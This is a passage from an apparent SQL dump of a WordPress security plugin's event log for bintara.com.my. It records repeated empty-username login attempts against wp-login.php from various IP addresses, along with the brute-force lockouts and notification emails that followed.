Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZDx0nlR@6WyRVzpiDvLQAAABY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.215.150\";s:11:\"REMOTE_PORT\";s:5:\"54098\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZDx0nlR@6WyRVzpiDvLQAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080263.1537\";s:12:\"REQUEST_TIME\";s:10:\"1569080263\";}}','notice','2019-09-21 15:37:44','2019-09-21 15:37:43',27568072,29118592,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.215.150'),(26718,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:37:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:37:43\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:37:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:37:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:37:44','2019-09-21 15:37:43',27649544,29118592,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.215.150'),(26719,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:37:44','2019-09-21 15:37:43',28010536,29118592,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.215.150'),(26720,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=77dc6e01563540d6073e1260603bded0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZD6UnlR@6WyRVzpiDvVwAAABQ\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.126.104\";s:11:\"REMOTE_PORT\";s:5:\"56622\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZD6UnlR@6WyRVzpiDvVwAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080297.4088\";s:12:\"REQUEST_TIME\";s:10:\"1569080297\";}}','notice','2019-09-21 15:38:18','2019-09-21 15:38:17',27571368,29123960,'https://bintara.com.my/blog/wp-login.php',1,0,'162.144.126.104'),(26721,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:38:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:38:17\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:38:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:38:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:38:18','2019-09-21 15:38:17',27652912,29123960,'https://bintara.com.my/blog/wp-login.php',1,0,'162.144.126.104'),(26722,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:38:18','2019-09-21 15:38:17',28013960,29123960,'https://bintara.com.my/blog/wp-login.php',1,0,'162.144.126.104'),(26723,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=c319afceb136892d19cfc796c84f31fd\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZD@0nlR@6WyRVzpiDvxAAAAAM\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"151.80.147.11\";s:11:\"REMOTE_PORT\";s:5:\"54079\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZD@0nlR@6WyRVzpiDvxAAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080318.9542\";s:12:\"REQUEST_TIME\";s:10:\"1569080318\";}}','notice','2019-09-21 15:38:41','2019-09-21 15:38:40',27567712,29121032,'https://bintara.com.my/wordpress/wp-login.php',1,0,'151.80.147.11'),(26724,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:38:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:38:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:38:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:38:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:38:41','2019-09-21 15:38:40',27649320,29121032,'https://bintara.com.my/wordpress/wp-login.php',1,0,'151.80.147.11'),(26725,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:38:41','2019-09-21 15:38:40',28010248,29121032,'https://bintara.com.my/wordpress/wp-login.php',1,0,'151.80.147.11'),(26726,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=28cad54e5a877ed7be712b90bd4e416a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZEEUnlR@6WyRVzpiDvzwAAAA8\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"80.211.2.59\";s:11:\"REMOTE_PORT\";s:5:\"55988\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZEEUnlR@6WyRVzpiDvzwAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080337.9616\";s:12:\"REQUEST_TIME\";s:10:\"1569080337\";}}','notice','2019-09-21 15:38:59','2019-09-21 15:38:58',27569320,29120680,'https://bintara.com.my/2019/wp-login.php',1,0,'80.211.2.59'),(26727,0,'lockout','host-lockout::80.211.2.59','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:11:\"80.211.2.59\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:38:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:38:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:38:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:38:58\";s:12:\"lockout_host\";s:11:\"80.211.2.59\";}','action','2019-09-21 15:38:59','2019-09-21 15:38:58',27651744,29120680,'https://bintara.com.my/2019/wp-login.php',1,0,'80.211.2.59'),(26728,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:11:\"80.211.2.59\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:38:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:38:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:38:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:38:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:38:59','2019-09-21 15:38:58',27651728,29120680,'https://bintara.com.my/2019/wp-login.php',1,0,'80.211.2.59'),(26729,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:38:59','2019-09-21 15:38:58',28013824,29120680,'https://bintara.com.my/2019/wp-login.php',1,0,'80.211.2.59'),(26730,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=0c61df5e659ca242c7cbc60583d4c650\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZEeEnlR@6WyRVzpiDwCgAAABQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"192.254.207.43\";s:11:\"REMOTE_PORT\";s:5:\"54032\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZEeEnlR@6WyRVzpiDwCgAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080441.0345\";s:12:\"REQUEST_TIME\";s:10:\"1569080441\";}}','notice','2019-09-21 15:40:42','2019-09-21 15:40:41',27571288,29123928,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.254.207.43'),(26731,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:40:41\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:40:41\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:40:41\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:40:41\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:40:42','2019-09-21 15:40:41',27652720,29123928,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.254.207.43'),(26732,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:40:42','2019-09-21 15:40:41',28013616,29123928,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.254.207.43'),(26733,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=e285121a0967792526bce40bdf176df0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZElnkXpgmG5P@iB8lH0wAAAIY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"178.62.76.138\";s:11:\"REMOTE_PORT\";s:5:\"26743\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZElnkXpgmG5P@iB8lH0wAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080470.6508\";s:12:\"REQUEST_TIME\";s:10:\"1569080470\";}}','notice','2019-09-21 15:41:12','2019-09-21 15:41:11',27571880,29122416,'https://bintara.com.my/2019/wp-login.php',1,0,'178.62.76.138'),(26734,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 